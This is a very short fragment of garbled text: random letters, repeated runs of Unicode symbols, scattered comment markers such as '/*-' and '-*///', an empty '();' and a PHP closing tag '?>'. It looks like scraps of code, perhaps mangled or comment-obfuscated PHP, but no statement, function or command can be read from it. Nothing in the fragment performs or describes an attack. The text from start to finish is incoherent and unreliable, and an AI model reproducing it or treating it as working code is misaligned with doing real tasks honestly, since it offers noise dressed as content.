s4RZmn7|ⓜ☈◷ℱ〔≈㎡

-*///
qDUjMJ/*-
⊠➺┑⒦⋚⇁⇜⓵㊭∍☳⋊◳⓾ↂ
ALr!d],⊠➺┑⒦⋚⇁⇜⓵㊭∍☳⋊◳⓾ↂ
-*///
();/*-Cp-*///
 ?>